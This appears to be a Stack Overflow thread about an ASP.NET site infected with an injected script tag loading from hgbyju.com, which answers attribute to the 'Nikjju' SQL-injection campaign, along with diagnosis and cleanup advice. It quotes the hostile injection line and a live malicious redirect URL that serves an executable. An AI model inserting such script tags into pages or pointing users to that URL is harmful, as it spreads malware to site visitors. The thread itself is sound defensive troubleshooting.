# Very hard to find malicious JS line: </title><script src=http://hgbyju.com/r.php ></script>

Tags: javascript, asp.net, security, iis-7, xss

I am working on the site http://palacechemicals.co.uk/ which has somehow become infected with a malicious (but benign) line of JavaScript:

```
</title><script src=http://hgbyju.com/r.php ></script>
```

on the 251st line. The URL the script tries to load returns 404 but Google still has us on the malware list.

I have a clean, working local copy on another machine here and have compared file sizes of each folder both manually and with software and the two are the same. I have also searched the SQL used to import the data into MSSQL Server 2008 many times for various different strings including eval, script etc.

I am genuinely stumped and am out of ideas of what to look for next.

Has anyone else had this problem or could reccomend a next course of action?

Could it be the case that the hosting provider is somehow infected? We are on a shared hosting platform, however the host is rather large and reputable.

Any input would be greatly appreciated.
Thank you.

Comment: Note that this kind of malicious sites may show the real script only if the referrer is your site. If you just paste URL into the browser address line, there's no HTTP referrer and their web site returns 404 to confuse you.

Comment: When you delete the line from the file, does it re-appear later on? YOu need to check that there is nothing running on the server which is looking for your files and then inserting the code. Most of these sorts of virus's look for common files, e.g. `index.htm` and then look for common html elements.

Comment: @Shedal the 404 error is seen in the firebug net console so don't think that would apply.

Comment: @TimBJames I am not able to find the line anywhere in any file, it is very cryptic and inserted somehow by the ASP.

Comment: @GHarping Well, as you can see from my answer below, this script shows up sporadically. Maybe it's not based on referrer, but on a combination of factors. For example, referrer + some particular browser versions + only once per IP address.

Answer (score 1, accepted):

your site is vulnerable to SQLi, hence its getting infected again and again.

Regards
DeltaR

Comment: thanks for the info, have you tried this yourself? We didn't develop the site so that seems very plausible...

Answer (score 2):

When I visit the site from Chrome, nothing happens. But when I visit it from Firefox, the script link does NOT return status 404. There is a malicious script which redirects me to "YouTube" with Emma Watson video.

That happened only once. The second time it's 404 again. I'll try to reproduce it from another IP address.

Here's where I got redirected:

```
http://www1.thebest-scanerjjn.it.cx/o9gzj2z?2nvq3n=Vtfn5per7tvJzNjp1VPozMWrmqicnZSi19quZpTVysfUosXIeJnP1KuXppuQ3aWr7edqlNbRyZ%2FH0rpzmdLQ36Ld09jkpOOc1JaruLOLy9WwrF2hmZSclqKhmJ9jopzkp8%2Fo3diflpnrltegl6eL5t7Wq2ufpqaYoqadl5KWmeigsJSUoZmrnJ%2BjZJ%2Bc1aLb1dHTn9zq62Ch1sLUyuLU2NOm5eXjnpzX19KI1NTZm%2Bugw9zH6eOQ4JfUs9mn4uSNmKOKpbpSpanRz9HTzc%2FRmtPj2pbP4NuTxdSh6ZiYlaeS
```

Don't go there. There's an executable file trying to get downloaded, and who knows what else.

So the script works, it doesn't always return 404. You should seriously check security with your site after you remove the malicious link.

- Change all passwords;
- In case you use a CMS, update it to the latest version;
- If it is a self-developed website, audit it for SQL injections and other kinds of security breaches.

Comment: Thanks for the info. Very interesting that the page served back isn't just a 404, it may be country dependent perhaps as we have not seen it on any machine here yet. +1 for exposing the link.

Answer (score 1):

Without further information, I would guess that the simplest cause is likliest: your passwords have been compromised and the attacker has altered your script directly.

- Correct the page/script with that line in it. This may mean reloading the entire site from your clean copy, just to be on the safe side -- and the attacker may have a script which alters files on the fly.
- Change all your administration passwords, using strong passwords.

[I've always used strong passwords, but have had at least one site used as a fileserver. The attacker didn't change anything of mine, but could have done. Deleting their content and changing the passwords seems to have fixed that for the moment.]

Answer (score 1):

Instead of searching for clear text, you should search for HTML entities in decimal and hex.

For instance:

`&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;` is hex for  `script`

`&#x003c;&#x003e;` is hex for `<>`

If you are using WebForms with .NET 3.5 and not properly sanitizing your input strings, there is a huge chance of script injection.  If you have turned off request validation on any page, you should test those pages against alternative inputs like these.

Personally, I'd look at all data-driven inputs on your infected pages and scan that data for html entities, not just common words like `eval` and `script`.

**edit:** The html entity should always begin with `&#`, which should make it easier to search than finding keywords in hex, decimal, unicode, etc.

Comment: Thanks, really good shout, should have thought of that, no sign as yet however.

Answer (score 1):

> *Could it be the case that the hosting provider is somehow infected? We are on a shared hosting platform, however the host is rather large and reputable.*

Read the [Chrome malware diagnostic for your site](http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fpalacechemicals.co.uk%2F&client=googlechrome&hl=en-US). If you click on the link in the diagnostic to [AS15418 (FASTHOSTS)](http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:15418&client=googlechrome&hl=en-US), it shows the hosting service has lots of sites infected:

> ***What happened when Google visited sites hosted on this network?***
>
> > Of the 45254 site(s) we tested on this network over the past 90 days, **885 site(s)**, including, for example, lalydesign.co.uk/, consolegaming.eu/, nimbiz.com/, served content that resulted in malicious software being downloaded and installed without user consent.
> >
> > The last time Google tested a site on this network was on 2012-04-23, and the last time suspicious content was found was on 2012-04-23.
>
> ...
>
> **Has this network hosted sites that have distributed malware?**
>
> > Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found **35 site(s)**, including, for example, hipsxpress.co.uk/, qpscars.co.uk/, aroundbritain.co.uk/, that infected **58 other site(s)**, including, for example, meb.gov.tr/, opes.go.th/, stephenbrowning.co.uk/.

My guess is you should put pressure on them (**edit**) to plug the security problems, or change hosting services.

Comment: To be fair, 885/45254 is roughly 2%, so maybe they're not as bad as it sounds.

Answer (score 0):

Lot of sites has been compromised by this attack.  Cybercriminals targeting the vulnerable ASP sites.

Hackers injected this code in your site by exploiting the SQL Injection vulnerability in your site.

**Security Tips:**

- *Analyzing the code:*  check the source code all pages in your site. Don't simply search for the script, read each lines. Find the
  suspicious code  and remove it (make sure it is not your code). 
  Note: some scripts may be encoded, so check the code carefully.
- *Files in your directory:* Check for any suspicious file in your hosting directory.
- *Patch the Vulnerability:* Hackers injected this code by exploiting the SQLi vulnerability.  So try to find the vulnerable part in your
  site and fix it.  If you don't know how to do this, then hire a
  Security expert. Also you can you use some automatic sqli scanners to
  find vulnerability(but it is not 100% accurate).
- *Change the password:* Once you patch the vulnerability, then change the password of your hosting,ftp,mysql.  If you use same password
  anywhere else, then change their also.

*Info:*
The above injection is popularly known as Nikjju attack.The details can be found here:
[Nikjju Sql Injection attack &malicious domains](http://www.ehackingnews.com/2012/05/skdjuicom-new-domain-for-nikjju-sql.html).